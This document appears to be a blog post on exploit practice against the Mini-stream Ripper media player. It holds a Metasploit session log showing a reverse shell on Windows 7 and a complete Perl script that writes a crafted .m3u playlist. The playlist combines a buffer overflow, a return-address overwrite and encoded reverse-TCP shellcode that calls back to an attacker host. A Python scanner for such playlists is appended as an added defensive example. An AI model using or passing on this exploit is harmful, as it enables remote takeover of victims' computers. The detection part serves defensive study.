Friday, September 2, 2011

Exploit Practice: Mini-stream Ripper

http://www.exploit-db.com/exploits/17744/ planted the seed, but I developed the code independently.

[*] Started reverse handler on 192.168.0.4:4444
[*] Starting the payload handler...
[*] Command shell session 4 opened (192.168.0.4:4444 -> 192.168.0.38:49178) at 2011-09-02 18:45:55 -0500

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Mini-stream\Mini-stream Ripper>systeminfo | find "OS Name"
systeminfo | find "OS Name"
OS Name: Microsoft Windows 7 Home Premium

C:\Program Files (x86)\Mini-stream\Mini-stream Ripper>

#!/usr/bin/perl
use strict;
use warnings;

# mini-stream ripper windows 7 home premium direct ret overwrite

my $filler = "A" x 26100; # distance to the saved return address, via msf3 pattern_create.rb / pattern_offset.rb
my $eip = "\x1b\x02\x04\x10"; # push esp; ret from MSRfilter01.dll (no ASLR) -- found via mona.py
my $nops = "\x90" x 20; # short NOP sled in front of the payload

# metasploit windows/shell_reverse_tcp, LHOST=192.168.0.4
# x86/shikata_ga_nai, badchars: \x00\x0a
my $shellcode =
"\xb8\x83\x92\x9f\xca\xda\xd6\xd9\x74\x24\xf4\x5b\x33\xc9" .
"\xb1\x4f\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x61\x67\x63" .
"\x22\xec\x88\x9c\xb3\x8e\x01\x79\x82\x9c\x76\x09\xb7\x10" .
"\xfc\x5f\x34\xdb\x50\x74\xcf\xa9\x7c\x7b\x78\x07\x5b\xb2" .
"\x79\xa6\x63\x18\xb9\xa9\x1f\x63\xee\x09\x21\xac\xe3\x48" .
"\x66\xd1\x0c\x18\x3f\x9d\xbf\x8c\x34\xe3\x03\xad\x9a\x6f" .
"\x3b\xd5\x9f\xb0\xc8\x6f\xa1\xe0\x61\xe4\xe9\x18\x09\xa2" .
"\xc9\x19\xde\xb1\x36\x53\x6b\x01\xcc\x62\xbd\x58\x2d\x55" .
"\x81\x36\x10\x59\x0c\x47\x54\x5e\xef\x32\xae\x9c\x92\x44" .
"\x75\xde\x48\xc1\x68\x78\x1a\x71\x49\x78\xcf\xe7\x1a\x76" .
"\xa4\x6c\x44\x9b\x3b\xa1\xfe\xa7\xb0\x44\xd1\x21\x82\x62" .
"\xf5\x6a\x50\x0b\xac\xd6\x37\x34\xae\xbf\xe8\x90\xa4\x52" .
"\xfc\xa2\xe6\x3a\x31\x98\x18\xbb\x5d\xab\x6b\x89\xc2\x07" .
"\xe4\xa1\x8b\x81\xf3\xc6\xa1\x75\x6b\x39\x4a\x85\xa5\xfe" .
"\x1e\xd5\xdd\xd7\x1e\xbe\x1d\xd7\xca\x10\x4e\x77\xa5\xd0" .
"\x3e\x37\x15\xb8\x54\xb8\x4a\xd8\x56\x12\xfd\xdf\xc1\x5d" .
"\x56\xdf\x15\x36\xa5\xdf\x04\x9a\x20\x39\x4c\x32\x65\x92" .
"\xf9\xab\x2c\x68\x9b\x34\xfb\xf8\x38\xa6\x60\xf8\x37\xdb" .
"\x3e\xaf\x10\x2d\x37\x25\x8d\x14\xe1\x5b\x4c\xc0\xca\xdf" .
"\x8b\x31\xd4\xde\x5e\x0d\xf2\xf0\xa6\x8e\xbe\xa4\x76\xd9" .
"\x68\x12\x31\xb3\xda\xcc\xeb\x68\xb5\x98\x6a\x43\x06\xde" .
"\x72\x8e\xf0\x3e\xc2\x67\x45\x41\xeb\xef\x41\x3a\x11\x90" .
"\xae\x91\x91\xa0\xe4\xbb\xb0\x28\xa1\x2e\x81\x34\x52\x85" .
"\xc6\x40\xd1\x2f\xb7\xb6\xc9\x5a\xb2\xf3\x4d\xb7\xce\x6c" .
"\x38\xb7\x7d\x8c\x69";

# write the crafted playlist; binmode so no byte is altered by newline translation
open(my $fh, '>', 'exp.m3u') or die "cannot open exp.m3u: $!";
binmode($fh);
print $fh $filler . $eip . $nops . $shellcode;
close($fh) or die "cannot close exp.m3u: $!";
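From the defender's side, the file this script produces is easy to tell apart from a real playlist: an .m3u entry is a path or URL, and here the single entry is tens of kilobytes of filler followed by raw machine-code bytes. The following Python scanner is an added example, not code from the original post, that flags playlist entries on exactly those properties (implausible length, control bytes, invalid UTF-8, and a run of 0x90 NOP bytes). The length limit of 2048 and the NOP-run length of 8 are assumptions chosen for this example; the two sample playlists are constructed and only mimic the shape of the post's file, not its bytes.

```python
"""Heuristic scanner for malformed .m3u playlist entries (added example)."""
from __future__ import annotations

import sys

# Assumption: no legitimate entry (a path or URL) is anywhere near this long.
# Windows MAX_PATH is 260, so 2048 leaves generous room even for long URLs.
MAX_ENTRY_LEN = 2048

# Assumption: a run of eight 0x90 bytes never appears in a genuine playlist line.
NOP_RUN = b"\x90" * 8


def scan_m3u(data: bytes, max_len: int = MAX_ENTRY_LEN) -> list[tuple[int, list[str]]]:
    """Return (line_number, [reasons]) for every entry that looks crafted."""
    findings: list[tuple[int, list[str]]] = []
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue  # blank line or an #EXTM3U / #EXTINF directive
        reasons: list[str] = []
        if len(line) > max_len:
            reasons.append(f"entry is {len(line)} bytes (limit {max_len})")
        control = [b for b in line if b < 0x20 or b == 0x7F]
        if control:
            reasons.append(f"{len(control)} control byte(s) in entry")
        try:
            line.decode("utf-8")
        except UnicodeDecodeError:
            reasons.append("entry is not valid UTF-8")
        if NOP_RUN in line:
            reasons.append("run of 0x90 (NOP) bytes in entry")
        if reasons:
            findings.append((lineno, reasons))
    return findings


# Constructed benign playlist: directives plus two ordinary entries.
BENIGN_PLAYLIST = (
    b"#EXTM3U\r\n"
    b"#EXTINF:213,Some Artist - Some Song\r\n"
    b"C:\\Music\\Some Artist\\some_song.mp3\r\n"
    b"http://example.com/stream/live.mp3\r\n"
)

# Constructed suspicious playlist shaped like the post's file: long filler,
# four bytes where a return address would sit, a NOP sled, then stand-in bytes.
SUSPICIOUS_PLAYLIST = (
    b"#EXTM3U\r\n"
    + b"A" * 26100            # filler, same size as the post's
    + b"\x01\x02\x03\x04"     # constructed stand-in for a return-address overwrite
    + b"\x90" * 20            # NOP sled
    + b"\xcc" * 8             # constructed stand-in for payload bytes
    + b"\r\n"
)


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else SUSPICIOUS_PLAYLIST
    for lineno, reasons in scan_m3u(data):
        print(f"line {lineno}: " + "; ".join(reasons))
```

Run it as `python m3u_scan.py suspect.m3u`; with no argument it scans the constructed suspicious sample and reports one entry with all four indicators. Comments and directives are skipped so that long `#EXTINF` titles do not cause false positives, and the UTF-8 check rather than a high-byte ratio keeps accented paths from being flagged.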
